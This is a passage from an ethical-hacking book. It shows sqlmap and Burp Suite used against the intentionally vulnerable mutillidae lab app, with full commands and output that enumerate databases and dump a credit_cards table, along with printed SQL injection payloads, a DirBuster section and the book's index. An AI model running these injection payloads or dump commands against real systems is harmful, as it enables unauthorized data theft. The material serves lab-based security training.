The sqlmap is command line based. It comes with Kali Linux by default. You can just open your terminal and start scanning by using sqlmap. However, as always, be careful about using it against any live system; don't use it without permission. If your client's web application has vulnerabilities, you can use sqlmap to detect the database, table names, columns, and even read the contents inside. We will see in a moment how we can do that.

Alongside Burp Suite and OWASP ZAP, I strongly recommend using sqlmap, as it is one of the most useful tools that we penetration testers use for finding security flaws in any web application.

Note There are many techniques to find out information about a database; as mentioned, sqlmap is a command-prompt tool, whereas Burp Suite and OWASP ZAP are GUI based. Learning both approaches (command line and GUI) means you can use the most appropriate techniques for you.

Let me scan my web site https://sanjibsinha.fun. We are going to retrieve all the information available about this web site. To do that, we will use a flag -a; it means retrieve everything. Learning about all these options is quite easy; you can read the documentation using this link: https://github.com/sqlmapproject/sqlmap/wiki/Usage or you can just type -h or --help.

//code A.1

```
root@kali:~# sqlmap -u https://sanjibsinha.fun -a
[!] legal disclaimer: Usage of sqlmap for attacking targets
without prior mutual consent is illegal. It is the end user's
responsibility to obey all applicable local, state and federal
laws. Developers assume no liability and are not responsible
for any misuse or damage caused by this program
[*] starting @ 06:24:04 /2019-08-20/
[06:24:05] [INFO] testing connection to the target URL
```

[06:24:08] [INFO] checking if the target is protected by some kind of WAF/IPS [06:24:09] [INFO] testing if the target URL content is stable [06:24:40] [WARNING] potential CAPTCHA protection mechanism detected [06:24:40] [WARNING] it appears that you have been blocked by the target server [06:24:40] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q) uit] c [06:24:53] [INFO] searching for dynamic content [06:25:00] [CRITICAL] target URL content appears to be heavily dynamic. sqlmap is going to retry the request(s) [06:25:22] [WARNING] target URL content appears to be too dynamic. Switching to '--text-only' [06:25:22] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index. php?id=1') [*] ending @ 06:25:22 /2019-08-20/

We have found a lot of interesting information about this site. First of all, it finds "target URL content appears to be heavily dynamic." That is true because I have used Wordpress and another database-driven dynamic blog engine inside; second, "potential CAPTCHA protection mechanism detected," which is also useful information. Finally, the sqlmap asks for any parameterized query like www.site.com/index.php?id=1. That, I don't have in my web site Therefore, we can conclude, apparently, the URL

provided has no vulnerabilities. However, we could extend our scanning inside and might find vulnerabilities in the database.

This can be done in our virtual lab on any intentionally vulnerable web application like mutillidae. In any client's web application, we can use the same technique to examine whether it has vulnerabilities or not.

Let us open the mutillidae SQL injection extract data user info page. In Chapter 10, you can check Figure 10-15 where it is shown how you can get that page. Before logging in as the user (Figure A-1), we have opened the Burp Suite and kept the intercept on.

Applications - P	Places - 🕑 Firefox ESR -		Tue 08	3:23			14	1 =	Φ	*
6			Mozilla F	irefox				0	۲	0
192.168.2.3/mutil	llidae/in × +									
€ → ℃ @	◎ 🔏 192.168.2.3	/mutillidae/index.php?page:	user-info.php		e	2 🗘	\downarrow	III\	0	Ξ
A Most Visited	Getting Started 🥆 Kali Linux 🥆	Kali Training 🥆 Kali Tools	Kali Docs	🗙 Kali Forums 🥆 NetHunter	Offensive Security	SExploit-DB	SHDB	MM:	SFu	
OWASP 2010		-								^
OWASP 2007	Back	👹 Help Me!								Ш
Web Services		Hints								Ш
HTML 5										10
Others	ALAX Switch	to SOAP Web Servic	e version	Switch to XPa	th version					
Documentation										
Resources	•	P	lease ente	r username and nas	sword					
a c			to vi	ew account details						
		Nam	e f	sanjib	10 - C					
Getting Starte Project	ed:	Pass	word							
Whitepaper	• · · · ·		, ,							
				View Account Details						
1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1			Dont have ar	account? Please registe	r here					
Release										
Announcemen	it's									
										-

Figure A-1. Logging into the mutillidae user info page

Since we have kept intercept on, we have got the request in our Burp Suite tool (Figure A-2).



Figure A-2. Capturing request in Burp Suite

Here is the output we have got in the Burp Suite:

//code A.2

```
GET /mutillidae/index.php?page=user-info.php&username=sanjib&
password=123456&user-info-php-submit-button=View+Account+Details
HTTP/1.1
Host: 192.168.2.3
User-Agent: Mozilla/5.0 (X11; Linux x86 64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.3/mutillidae/index.php?page=user-
info.php
Cookie: showhints=1; PHPSESSID=h5ssn4mn749e9apf1j5h
flmbm3; acopendivids=swingset,jotto,phpbb2,redmine;
acgroupswithpersist=nada
Connection: close
Upgrade-Insecure-Requests: 1
```

Next, we will send this request to the Repeater section of Burp Suite to get the response (Figure A-3). We want to be sure that our response is perfectly correct. We have captured the user name and password successfully. However, we want to use this request to find the database and more database-related information using sqlmap.



Figure A-3. In the Repeater section of Burp Suite where we test the response

Save the request as the test.request file in the /tmp folder of Kali Linux. You can do that through the terminal, or you can open a text editor like gedit, paste the request, and save it in the /tmp folder. You don't need to save it in /tmp; you could have saved it anywhere, such as on the desktop. Wherever you save the file, you need to go to that directory and issue this command to find out about the database:

```
//code A.3
```

```
root@kali:/tmp# sqlmap -r test.request --banner
```

We are using the --banner flag to give us the information about the database used in an application. The --banner flag retrieves only the DBMS banner; and this time we want only that. We are not interested in retrieving all the information. In that case, we would have used -a.

Here the output is quite big, so we need to make it short for brevity.

//code A.4

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 08:30:37 /2019-08-20/ [08:30:37] [INFO] parsing HTTP request from 'test.request' [08:30:38] [INFO] testing connection to the target URL [08:30:40] [INFO] heuristics detected web page charset 'windows-1252' [08:30:40] [INFO] testing if the target URL content is stable [08:30:40] [INFO] target URL content is stable [08:30:40] [INFO] testing if GET parameter 'page' is dynamic [08:30:41] [INFO] GET parameter 'page' appears to be dynamic [08:31:04] [INFO] testing 'MySQL >= 5.0 AND error-based -WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [08:33:51] [INFO] testing if GET parameter 'username' is dynamic [08:33:53] [WARNING] GET parameter 'username' does not appear to be dynamic [08:43:14] [INFO] target URL appears to have 7 columns in query [08:43:21] [INFO] GET parameter 'username' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable

```
GET parameter 'username' is vulnerable. Do you want to keep
testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total
of 218 HTTP(s) requests:
    Payload: page=user-info.php&username=-3423' OR
    4975=4975#&password=123456&user-info-php-submit-button=View
    Account Details
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER
    BY or GROUP BY clause (FLOOR)
    Payload: page=user-info.php&username=sanjib' AND (SELECT 8222
    FROM(SELECT COUNT(*),CONCAT(0x7162767071,(SELECT (ELT(8222=
    8222,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION
    SCHEMA.PLUGINS GROUP BY x)a)-- dNfA&password=123456&user-info-
    php-submit-button=View Account Details
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: page=user-info.php&username=sanjib' AND SLEEP(5)--
    sJJx&password=123456&user-info-php-submit-button=View
    Account Details
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: page=user-info.php&username=sanjib' UNION ALL
    SELECT NULL, CONCAT(0x7162767071, 0x4d72546474614551564b707a5
    54b4b6d6d4542524f6547444953444f52656a4b5a724c6a514c5868,0x7
    162717a71), NULL, NULL, NULL, NULL, NULL#&password=123456&user-
    info-php-submit-button=View Account Details
[08:43:23] [INFO] the back-end DBMS is MySQL
[08:43:23] [INFO] fetching banner
```

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0
banner: '5.1.41-3ubuntu12.6-log'
[08:43:24] [INFO] fetched data logged to text files under '/
root/.sqlmap/output/192.168.2.3'

```
[*] ending @ 08:43:24 /2019-08-20/
```

We have finally discovered the database; it is MySQL. We have received other information about the application as well (Figure A-4).

Applications -	Places 🔻 🗈 Terminal 🔻	Tue 08:34	I # / <0 ·
68		root@kali: /tmp	000
File Edit View	Search Terminal Help		
[08:31:24]	[INFO] testing	'Oracle AND error-based - WHERE or HAVING clause (XMLType)	-
[08:31:31]	[INFO] testing	'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'	
[08:31:32]	[INFO] testing	'MySQL inline queries'	
[08:31:34]	[INFO] testing	'PostgreSQL inline queries'	
[08:31:35]	[INFO] testing	'Microsoft SQL Server/Sybase inline queries'	
[08:31:36]	[INFO] testing	'PostgreSQL > 8.1 stacked queries (comment)'	
[08:31:43]	[INFO] testing	'Microsoft SQL Server/Sybase stacked queries (comment)'	and the second s
[08:31:50]	[INFO] testing	'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - commer	nt)'
[08:31:55]	[INFO] testing	'MySQL >= 5.0.12 AND time-based blind'	
[08:32:03]	[INFO] testing	'PostgreSQL > 8.1 AND time-based blind'	
[08:32:11]	[INFO] testing	'Microsoft SQL Server/Sybase time-based blind (IF)'	
[08:32:19]	[INFO] testing	'Oracle AND time-based blind'	
[08:32:26]	[INFO] testing	'Generic UNION query (NULL) - 1 to 10 columns'	
[08:33:51]	[WARNING] GET	parameter 'page' does not seem to be injectable	
[08:33:51]	[INFO] testing	if GET parameter 'username' is dynamic	
[08:33:53]	[WARNING] GET	parameter 'username' does not appear to be dynamic	
[08:33:54]	[INFO] heurist:	ic (basic) test shows that GET parameter 'username' might be	e injectable (p
ossible DB	MS: 'MySQL')		
[08:33:56]	[INFO] heurist:	ic (XSS) test shows that GET parameter 'username' might be	vulnerable to c
ross-site	scripting (XSS)	attacks	
[08:33:56]	[INFO] testing	for SQL injection on GET parameter 'username'	
it looks l	ike the back-end	d DBMS is 'MySQL'. Do you want to skip test payloads specif:	ic for other DB

Figure A-4. The back-end DBMS is MySQL

Now, we are sure about the database, and the column name username has vulnerabilities; therefore, we can use them in our next level of scanning with sqlmap and we will acquire that information.

//code A.5

root@kali:/tmp# sqlmap -r test.request -p username --dbms=MySQL
--banner

The output is as usual quite big, so we are not going to give the complete output here. The last part of the output is as follows, which is important for us. Furthermore, we have used option -r for loading the HTTP request from a file. By default, sqlmap tests all GET parameters and POST parameters. Still, we don't want them every time we scan a database; in such cases, we can use option -p to test for GET parameter id and for HTTP User-Agent only. It will provide the id and the user-agent.

```
//code A.6
```

```
Parameter: username (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    (MySQL comment)
    Payload: page=user-info.php&username=-3423' OR
    4975=4975#&password=123456&user-info-php-submit-button=View
    Account Details
    Type: error-based
    Title: MySOL >= 5.0 AND error-based - WHERE, HAVING, ORDER
    BY or GROUP BY clause (FLOOR)
    Payload: page=user-info.php&username=sanjib' AND (SELECT 8222
    FROM(SELECT COUNT(*),CONCAT(0x7162767071,(SELECT (ELT(8222=
   8222,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION
    SCHEMA.PLUGINS GROUP BY x)a)-- dNfA&password=123456&user-
    info-php-submit-button=View Account Details
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: page=user-info.php&username=sanjib' AND SLEEP(5)--
    sJJx&password=123456&user-info-php-submit-button=View
```

Account Details

```
Type: UNION query
    Title: MySOL UNION query (NULL) - 7 columns
    Payload: page=user-info.php&username=sanjib' UNION ALL
    SELECT NULL, CONCAT(0x7162767071, 0x4d72546474614551564b707a5
    54b4b6d6d4542524f6547444953444f52656a4b5a724c6a514c5868,0x7
    162717a71), NULL, NULL, NULL, NULL, NULL#&password=123456&user-
    info-php-submit-button=View Account Details
[08:47:22] [INFO] testing MySOL
[08:47:23] [WARNING] reflective value(s) found and filtering out
[08:47:23] [INFO] confirming MySOL
[08:47:29] [INFO] the back-end DBMS is MySOL
[08:47:29] [INFO] fetching banner
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySOL >= 5.0.0
banner: '5.1.41-3ubuntu12.6-log'
[08:47:29] [INFO] fetched data logged to text files under '/
root/.sqlmap/output/192.168.2.3'
```

```
[*] ending @ 08:47:29 /2019-08-20/
```

We have gotten more information, such as the nature of the database, the server operating system, the application technology, its version, the database version, and the banner also; however, we want all the database names used in the OWASP broken web application. So we will continue the scanning:

//code A.7

```
root@kali:/tmp# sqlmap -r test.request -p username --dbms=MySQL
--dbs
```

It will give us a complete list of databases (Figure A-5). The intentionally vulnerable application mutillidae is one of them.



Figure A-5. The complete list of all databases in the OWASP broken web application

The output of the complete list of databases looks like this:

//code A.8

```
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: page=user-info.php&username=sanjib' UNION ALL
SELECT NULL,CONCAT(0x7162767071,0x4d72546474614551564b707a5
54b4b6d6d4542524f6547444953444f52656a4b5a724c6a514c5868,0x7
162717a71),NULL,NULL,NULL,NULL,NULL#&password=123456&user-
info-php-submit-button=View Account Details
----
[08:49:35] [INFO] testing MySQL
[08:49:35] [INFO] confirming MySOL
```

```
[08:49:37] [WARNING] reflective value(s) found and filtering out
```
```
[08:49:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL >= 5.0.0
[08:49:37] [INFO] fetching database names
available databases [34]:
[*] .svn
[*] bricks
[*] bwapp
[*] citizens
[*] cryptomg
[*] dvwa
[*] gallery2
[*] getboo
[*] ghost
[*] gtd-php
[*] hex
[*] information schema
[*] isp
[*] joomla
[*] mutillidae
[*] mysql
[*] nowasp
[*] orangehrm
[*] personalblog
[*] peruggia
[*] phpbb
[*] phpmyadmin
[*] proxy
[*] rentnet
[*] sqlol
```

- [*] tikiwiki
- [*] vicnum
- [*] wackopicko
- [*] wavsepdb
- [*] webcal
- [*] webgoat_coins
- [*] wordpress
- [*] wraithlogin
- [*] yazd

[08:49:38] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.2.3'

[*] ending @ 08:49:38 /2019-08-20/

Now, we are in a position to examine any database belonging to that list. We are interested in the nowasp database. We could have chosen any one of them, no problem. We can use the database name and pass the tables flag to get the exact output of the table names (Figure A-6).



Figure A-6. Now we can see the table names in a particular database.

The command is like this:

//code A.9

```
root@kali:/tmp# sqlmap -r test.request -p username --dbms=MySQL
-D nowasp --tables
```

The output is quite expected; we get all the table names.

//code A.10

```
. . .
[08:51:31] [INFO] testing MySQL
[08:51:31] [INFO] confirming MySQL
[08:51:33] [WARNING] reflective value(s) found and filtering
out
[08:51:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySOL >= 5.0.0
[08:51:33] [INFO] fetching tables for database: 'nowasp'
Database: nowasp
[12 tables]
+----+
| accounts
| balloon tips
| blogs table
| captured data
| credit cards
| help texts
| hitlog
| level 1 help include files |
| page help
| page hints
```

```
| pen_test_tools |
| youtubevideos |
+----+
```

[08:51:34] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.2.3' [*] ending @ 08:51:34 /2019-08-20/

Would you like to see what the table credit_cards contains? Well, the command is now simple enough to know all the column names.

//code A.11

```
root@kali:/tmp# sqlmap -r test.request -p username --dbms=MySQL
-D nowasp -T credit cards --columns
```

We have passed the table name first, and after that, we pass the --columns flag to get the column names (Figure A-7).



Figure A-7. All the column names of the credit_cards table

Here is the output. We have shortened it for brevity.

```
//code A.12
```

```
[08:54:05] [INFO] testing MySOL
[08:54:05] [INFO] confirming MySQL
[08:54:06] [WARNING] reflective value(s) found and filtering out
[08:54:06] [INFO] the back-end DBMS is MySOL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySOL >= 5.0.0
[08:54:06] [INFO] fetching columns for table 'credit cards' in
database 'nowasp'
Database: nowasp
Table: credit cards
[4 columns]
+----+
| Column
          Type
                    +----+
| ccid | int(11) |
| ccnumber | text
CCV
           | text
| expiration | date
+----+
[08:54:07] [INFO] fetched data logged to text files under
```

'/root/.sqlmap/output/192.168.2.3'

```
[*] ending @ 08:54:07 /2019-08-20/
```

Finally, we can dump all the data from the credit_cards table by a single command.

//code A.13

root@kali:/tmp# sqlmap -r test.request -p username --dbms=MySQL -D nowasp -T credit_cards --dump

This command will dump all the data that the table has inside it (Figure A-8).



Figure A-8. Dumping all data of a table by using sqlmap

Here is the output of the inside data of the table credit_cards.

```
//code A.14
[08:56:26] [INFO] testing MySQL
[08:56:26] [INFO] confirming MySQL
[08:56:28] [WARNING] reflective value(s) found and filtering out
[08:56:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL >= 5.0.0
[08:56:28] [INFO] fetching columns for table 'credit_cards' in
database 'nowasp'
[08:56:28] [INFO] fetching entries for table 'credit_cards' in
database 'nowasp'
Database: nowasp
```

Table: credit cards [5 entries] +----+ | ccid | ccv | ccnumber | expiration | +----+ 745 | 4444111122223333 | 2012-03-01 | 1 | 722 | 7746536337776330 | 2015-04-01 | 2 3 461 8242325748474749 2016-03-01 230 | 7725653200487633 | 2017-06-01 | 4 5 | 627 | 1234567812345678 | 2018-11-01 |

[08:56:29] [INFO] table 'nowasp.credit_cards' dumped to CSV file '/root/.sqlmap/output/192.168.2.3/dump/nowasp/credit_ cards.csv' [08:56:29] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.2.3' [*] ending @ 08:56:29 /2019-08-20/

We have just shown how powerful sqlmap can be. As a penetration tester, you can test your client's application using sqlmap, especially when database-related scanning is necessary. The hacking tool sqlmap is used specifically to automate SQL injection. In real life, to counter bad guys from compromising your database and back-end infrastructure, you need to make sure that your database is secured. For that reason, besides Burp Suite and OWASP ZAP, sqlmap is considered to be one of the most important tools for hunting security bugs in any web application.

How Source Code Disclosure Helps Information Gathering

Information gathering is a part of hunting security bugs. As you have seen in the preceding examples, while I was scanning a request, I received a lot of information simultaneously. This information helps a penetration tester to recognize a specific web application. The disclosure about the application is often found in HTML comments and at the same time in certain patterns in the HTML page source code. The links to specific CSS or JavaScript folders also augment chances to find the paths of files and folders that also come to a penetration tester's aid. Finding any web site's HTML source code is not difficult. Staying on any web page, you can click the second mouse button and you will see "View page source." Clicking on https://sanjibsinha.fun

<head>

```
<title>Sanjib Sinha...</title>
        <meta charset="UTF-8">
        <meta name="description" content="I write for Apress... ">
        <meta name="keywords" content="Apress, Sanjib Sinha,
         Computer Science, Kolkata, C, C++, Dart, Flutter, Mobile
         Apps, Python, Ethical Hacking, PHP, Laravel... ">
        <meta name="viewport" content="width=device-width,
         initial-scale=1.0">
    <!-- Styles -->
   <style>
/*!
 * Bootstrap v4.1.3 (https://getbootstrap.com/)
* Copyright 2011-2018 The Bootstrap Authors
. . .
</style>
</head>
216
```

For brevity, I have shortened the <head></head> tag. This is a simple PHP page and the HTML output is also very simple. For a big web application it could be different; yet you are always in a state to gather some passive information from this HTML source. However, tools like sqlmap, Burp Suite, or OWASP ZAP will always give more information about any target. Supposing you want to know about the application language; you cannot get it from the HTML source code. If an application uses any CMS or any framework like Laravel, it can be best found with those tools only. We have seen those examples before.

From the metatag, we know about the nature of the application and its versions.

When we see some metatag like this:

//code A.15

```
<meta name="generator" content="WordPress 3.9.2" />
```

we can easily determine the nature of the application. But, to get that particular information, we need to use Burp Suite.

In the Burp Suite Repeater tool, we have seen how the response part of a web application always gives us the full application infrastructure. We can see that important information is placed between the <head></head> tags, in <meta> tags, or at the end of the page.

We can gather information from the HTML sources; furthermore, we can find the specific files and folders. That will also help us. A good tool is DirBuster. Its author is OWASP; therefore, it's free and community based. Just open your terminal in Kali Linux and type:

```
//code A.16
```

```
root@kali:~# dirbuster
```

It will open the software like this (Figure A-9).

Applications -	Places -	📌 com-sittinglittleduck-DirBuster-Start 👻 Tue 08:23	48	1 0 0 -
1		root@kali:~ - □ x		
ch08-1		rot East view Search Terminal Help rootEkali:-# dirubuster Starting OWASP DirBuster 1.0-RC1		
2		OWASP DirBuster 1.0-RC1 - Web Application Brute Forcing 🛛 😔 🕲 🔕		
urp-pass		File Options About Help		
		Target URL (eg http://example.com.80/)		
th09-1		Work Method ○ Use GET requests only ⊙ Auto Switch (HEAD and GET) Number Of Threads =:[] 0 Threads □ Threads		
€ ■		Select scanning type: O List based brute force Pare Brute Force Pare Brute Force Pare with list of druffles O monoid O		
		Chur set <u>\$25720-91320</u> • Min length 1 Max Length 1		
ml-code-		Select starting options: Standard start point URL Fuzz Rute Force Drs. Be Recursive Dr to start with F Rute Force Fina Enter Start Recursion		
		URi, to fuzz - (test.html/uri= (dir), asp		
chap10-1		B Ext D Start		

Figure A-9. The OWASP Dirbuster is a handy tool for information gathering.

Determining the nature of a specific application is a part of hunting security bugs. A few paths to the specific files and folders may be found from the HTML source codes, but not all. In such cases, DirBuster may come to our aid. It finds out the paths to folders and files that are not explicitly presented in the HTML source code. This tool brute-forces a target with folder and file names, and at the same time it monitors the HTTP responses. Based on the finding, a penetration tester can find default files and attack them accordingly.

What Could Be the Next Challenges to Hunting Bugs?

A successful penetration tester may want to become a bounty hunter. You can earn money, as well as fame and respect from the hacking community. As time passes by, you must prepare yourself to encounter difficulties.

As you progress, the situations will be demanding and stimulating at the same time. A hacker who is paid to find vulnerabilities in software and web sites is called a bug bounty hunter; however, a high degree of curiosity is required along with a high degree of computer skills. The main requirement is that you need to keep learning continuously.

In this book you have learned a few techniques; moreover, you have learned how to organize yourself using different software hacking tools. Besides using them frequently, you need to prepare yourself by analyzing the default application installs; analysis of system and application documentation is extremely important. You need to analyze error messages; researching old web exploits will also help.

Remember, a successful penetration tester spends a lot of time describing the issue as clearly as possible. When you write the proof of concept, avoid introducing unnecessary reading overhead; be to the point and write it as precisely as possible.

While doing your homework, remember a few key points. Since in most of the bug bounty programs the focus of activity is centered on the web application, you need to read the publicly disclosed bugs on web sites like HackerOne and others as well. Check out Google's Bughunter University. If you are a complete beginner, you need to make yourself comfortable with the virtual lab first. Install the OWASP Broken Web Application so that you can prepare yourself on intentionally vulnerable applications like mutillidae or bWAPP.

In this book we have tried to learn about hunting security bugs in web applications step by step; however, everything takes time and it takes persistence, hours of research, and determination to become a successful penetration tester and a bug bounty hunter.

Index

A. B

Bug bounty platforms advantages, 2, 3 list. 3 **Burp Suite** --banner flag, 203, 204 database in owaspbwa, 208, 210 DirBuster tool, 217, 218 features. 21 interceptor, 28 mutillidae SQL injection, 200 MySQL, 205 no proxy to manual proxy, 26, 27 open, 19, 20 output, 201 9500 port, 27, 28 Repeater section, 202 Repeater tool, 217 table name database. 210, 212-215 tools sqlmap, 197, 198 ZAP. 197 traffic. 29 web application, 30 web vulnerabilities, 20 working, 20

© Sanjib Sinha 2019 S. Sinha, Bug Bounty Hunting for Web Security, https://doi.org/10.1007/978-1-4842-5391-5

С

Command injection Intruder tool, payload position add types, 161 attack result. 163 in base request, 159, 160 directory, 165 reserved characters. 162 response, 163 word length, 164 Cross-site Request Forgery (CSRF) attack Burp Suite, 40, 44 clicking links/button/ image, 42, 43 JavaScript attacking script, 43, 44 OWASP ZAP, 41, 42 penetration tester, 39 techniques by hackers, 45 in real world, 38, 39 web application, OWASP Juice Shop attack. 54 Burp Suite, 48, 49 Burp Suite repeater, 50–52 inject JavaScript code, 54

Cross-site Request Forgery (CSRF) (cont.) solved problems, 53 testing defenses, 50 Cross-site Scripting (XSS), 39 discovering vulnerabilities Burp Suite output, 63 owaspbwa, BWAPP application, 62 owaspbwa, Javascript code, 64, 65 owaspbwa, web application, 60 OWASP ZAP tool, 68 test Vicnum application, 66, 67 ZAP scanning report, 69, 70 exploit vulnerabilities, DVWA Brute forcing, 75, 76 install OWASP BWA, 71 logged in Burp Suite, 77, 78 payload positions, 73, 75 user-name and password, 72, 73 reflected, 59 stored/persistent, 59

D, E, F, G

Damn Vulnerable Web Application (DVWA), 71 DirBuster, 217 Document type definition (DTD), 125 Domain-based message authentication reporting and conformance (DMARC), 118 Domain Name Service (DNS), 116

Η

Header injection and URL redirection malicious site, 80-82 PHP code, 79 vulnerabilities Burp Suite, 94 Http request parameter, 88–91 penetration tester, 96 response, 93, 95 URL parameter, 92 XSS intercepted Burp Suite, 83 owaspbwa, 82, 83 Site map tool, 85-87 Spider tool, 84, 85 URL output, 88 HTML injection exploiting, mutillidae application blog page, 179 change color of web page, 177 code defaced, 178 marquee element, 180, 181 penetration tester, 181 vulnerabilities, bWAPP application

Burp Suite reads data, 174, 175 login form, 173 open Burp Suite, 170 POST data, 171 stored blog page, 172, 176 web page, 168, 169

I, J

Internet Engineering Task Force (IETF), 116

K, L

Kali Linux BlackArch Linux, 11 ImprediaOS, 11 installation, 10, 15, 16 ISO image, 14, 15 memory size, 14 Qubes OS, 11 Tails, 12 Whonix, 12 Kali Linux tools Burp Suite tool (see Burp Suite) installation, 17, 18 cms-explorer, 35 download, 17 httrack, 32 nikto, 32, 33 nmap, 32, 33 OWASP ZAP, 21-23 advantage, 26

proxy to a browser, 26 sqlmap, 32 WebGoat command, 24, 25 downloading, 23, 24 launching, 26 8080 port, 25 wpscan, 32 Zoom, 35

M, N

Malicious Commands, injecting mutillidae add to Burp Suite, 154 Repeater tool, 156–158 request on Intruder tool, 159 response on Target and Sitemap, 155, 156 Malicious files Burp Suite, 103, 104 DVWA web application, 98 file upload form, 98 file-upload-module interface, 99, 100 hacker, 105, 106 PHP code, 103, 104 PHP session, 101, 102 PHP shell command, 105 server-side script, 101 traditional defacement, 112-114 upload image, 100 web site, owning

Malicious files (*cont*.) Burp Suite Repeater tab, 108–110 defacement, 107 .htaccess file, 108 malicious PHP shell code, 112 metadata, 107 request and response, 111 shell-command.php, 108, 110

0

OS Command Injection DNS in mutillidae, 149, 150 malicious separators, 152 monitor scanning, 153 open owaspbwa, 148 OWASP Broken Web Application (owaspbwa), 60

P, Q, R

Penetration tester, 2, 67, 219

S

Sender Policy Framework (SPF) definition, 115 testing records, 116, 117 vulnerabilities DMARC, 118, 122 examining record, 120

pen tester, 119, 121 Session riding/Sea surfing/ **CSRF**, **38** Site map tool, 85 Spider tool, 85 SQL injection (SQLi) attacks, 182 Bypass authentication, mutillidae application admin user login, 188, 189 **Boolean** literal page, 188 creating account, 184 getting records, 185 SQL statement, 185 tautology, 186 user Info (SQL) page, 183 definition, 182 discovering database, mutillidae application database, 196 HTTP history, 190 intruder attacks, 194 open, 190 payloads position, 191, 192, 194 syntax-errors, 195 SQLMAP, 197, 198

T, **U**

Tautology, 186

V, **W**

Vicnum, 66 VirtualBox install, 9, 10 window pops up, 13 Virtual environment/virtualization, 8

X, Y, Z

XML definition, 124 external entity injection, 126 fetching system configuration file Intruder tool, Burp Suite output, 136, 137 Intruder tool, payload position output, 135

Intruder tool, payload section, 138, 139 mutillidae application, 143-145 payload Length column, 142 XXE attacks, 141, 142 injection in virtual lab attack using Burp Suite Intercept tool, 130, 131 inject entity, 133 mutillidae application, 128, 130 owaspbwa application, 127 Repeater tool, 131, 132